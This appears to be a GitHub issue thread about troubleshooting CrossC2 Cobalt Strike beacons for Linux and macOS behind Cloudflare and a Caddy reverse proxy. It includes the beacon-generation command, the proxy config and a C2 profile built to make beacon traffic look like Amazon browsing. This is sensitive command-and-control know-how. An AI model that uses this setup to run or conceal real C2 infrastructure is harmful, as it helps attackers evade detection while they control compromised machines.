gloxec / CrossC2

generate CobaltStrike's cross-platform payload

cs4.4+cloudflare+caddy beacons check in but cannot execute commands #226

Open kuron3k0 opened 3 months ago

kuron3k0 commented 3 months ago

Problem description:

Currently both the Linux and the Mac beacons check in, but they cannot execute commands. If the listener is switched to checking in via the IP address, commands execute fine. After putting Cloudflare in front it does not work regardless of whether the CDN is enabled or not. I have also set a cache-bypass rule for URLs starting with the profile's URL path. The profile I am using runs normally on Windows.

Environment and configuration:

Payload generation: genCrossC2.MacOS vpsdomain 8443 ./.cobaltstrike.beacon_keys ;;/xxx/amazon.profile Linux x86 /tmp/t_cc2.out raw

Caddy (v1) is used as a reverse proxy:

https://vpdomain:8443 {
        tls /xxx/server.pem /xxx/server.key
        proxy /s/ https://127.0.0.1:18443 {
            insecure_skip_verify
            header_upstream X-Forwarded-For {http.request.header.CF-Connecting-IP}
        }
}

Profile:

#
# Amazon browsing traffic profile
#
# Author: @harmj0y
#

set sleeptime "5000";
set jitter    "0";
dns-beacon {
    set maxdns    "255";
}
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36";

https-certificate {
    set keystore "cs.store";
    set password "password";
}

http-config {
    set trust_x_forwarded_for "true";
}

http-get {

    set uri "/s/ref=sx_fk_boss_1/161237-88-7583756/field-keywords=animals";

    client {

        header "Accept" "*/*";
        header "Host" "vpsdomain";
        #header "Connection" "close";

        metadata {
            base64;
            prepend "session-token=";
            prepend "skin=noskin;";
            append "csm-hit=s-7KKN11BB82RZSYGJ3BDK|1418809012996";
            header "Cookie";
        }
    }

    server {

        header "Server" "Nginx";
        header "x-amz-id-1" "AGTJNFTGDWPGY5T42PZT";
        header "x-amz-id-2" "b89yZ2xFHbtVgGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Content-Encoding" "gzip";

        output {
            print;
        }
    }
}

http-post {

    set uri "/s/ref=K4805/adj/amzn.en.sr.aps";

    client {

        header "Accept" "*/*";
        #header "Content-Type" "text/xml";
        header "X-Requested-With" "XMLHttpRequest";
        header "Host" "vpsdomain";
        #header "Connection" "close";

        parameter "sz" "160x600";
        parameter "oe" "oe=ISO-8859-1;";

        id {
            parameter "sn";
        }

        parameter "s" "3717";
        parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";

        output {
            base64;
            print;
        }
    }

    server {

        header "Server" "Nginx";
        header "x-amz-id-1" "AGtYVBHT67PGY5T42OZT";
        header "x-amz-id-2" "tikJo1xrNnNtdGRsam19bGV30W85amZ8ZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "x-ua-compatible" "IE=edge";

        output {
            print;
        }
    }
}

gloxec commented 3 months ago

You need to confirm what happens after a command is issued: was it executed but the result not sent back, or was it not executed at all? touch /tmp/aaaaa

kuron3k0 commented 3 months ago

Hmm, it was simply not executed at all.

gloxec commented 2 months ago

The cs+nginx+cf_cdn deployment is fairly common, and communication and control work normally with it.

Then it should be that the Linux beacon is not receiving the command issued by the teamserver. A possible cause is the Connection value in the HTTP headers configured in the C2 profile, because the Linux beacon sends and receives strictly according to the C2 profile contents, whereas the Windows beacon does not fully adhere to the data set in the C2 profile when sending data.

Try changing the http-get/post sections of the C2 profile to use header "Connection" "close";. A possibly similar issue: https://github.com/gloxec/CrossC2/issues/161